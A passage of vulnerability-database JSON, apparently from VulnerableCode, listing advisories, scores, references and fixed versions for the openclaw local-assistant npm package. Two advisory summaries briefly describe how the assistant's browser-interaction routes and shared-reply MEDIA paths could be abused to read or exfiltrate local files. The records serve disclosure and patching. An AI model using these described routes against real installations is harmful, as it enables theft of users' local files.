                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-34504",
                "GHSA-qxgf-hmcj-3xw3"
            ],
            "risk_score": 3.8,
            "exploitability": "0.5",
            "weighted_severity": "7.5",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-w2rd-2j4p-gfgw"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89348?format=api",
            "vulnerability_id": "VCID-w2tj-nqa6-cuam",
            "summary": "OpenClaw: Browser interaction routes could pivot into local CDP and regain file reads\n## Summary\n\nBrowser interaction routes could pivot into local CDP and regain file reads.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.9`\n- Patched versions: `>= 2026.4.9`\n\n## Impact\n\nBrowser act/evaluate interactions could trigger navigation into the local CDP origin and then create or read disallowed `file://` pages despite direct navigation guards.\n\n## Technical Details\n\nThe fix re-checks browser URLs after interaction-driven navigations and blocks targets that violate the configured navigation policy.\n\n## Fix\n\nThe issue was fixed in #63226. The first stable tag containing the fix is `v2026.4.9`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `5f5b3d733bdd791cb457f838514179e1288b10b3`\n- PR: #63226\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.9 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @tdjackey for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/5f5b3d733bdd791cb457f838514179e1288b10b3",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/5f5b3d733bdd791cb457f838514179e1288b10b3"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/63226",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/63226"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qmwg-qprg-3j38",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qmwg-qprg-3j38"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qmwg-qprg-3j38",
                    "reference_id": "GHSA-qmwg-qprg-3j38",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-qmwg-qprg-3j38"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/110121?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.9",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-k8x3-9pv7-rfax"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-rvcq-rqbq-4khp"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.9"
                }
            ],
            "aliases": [
                "GHSA-qmwg-qprg-3j38"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-w2tj-nqa6-cuam"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89467?format=api",
            "vulnerability_id": "VCID-w4p1-sxdg-hyha",
            "summary": "OpenClaw: Shared reply MEDIA - paths are treated as trusted and can trigger cross-channel local file exfiltration\n## Impact\n\nShared reply MEDIA: paths are treated as trusted and can trigger cross-channel local file exfiltration.\n\nA crafted shared reply MEDIA reference could cause another channel to read a local file path as trusted generated media.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.4`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @threalwinky for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42424",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00029",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0867",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00029",
                            "scoring_system": "epss",
                            "scoring_elements": "0.0869",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00029",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08675",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42424"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "5.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:12:58Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qqq7-4hxc-x63c",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "5.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:12:58Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qqq7-4hxc-x63c"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42424",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42424"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-local-file-exfiltration-via-shared-reply-media-paths",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "5.7",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N"
                        },
                        {
                            "value": "5.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T13:12:58Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-local-file-exfiltration-via-shared-reply-media-paths"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-qqq7-4hxc-x63c",
                    "reference_id": "GHSA-qqq7-4hxc-x63c",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-qqq7-4hxc-x63c"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.8",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2g7x-vu14-nkde"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dqb2-dej7-augt"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-wyat-1259-2kg9"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8"
                }
            ],
            "aliases": [
                "CVE-2026-42424",
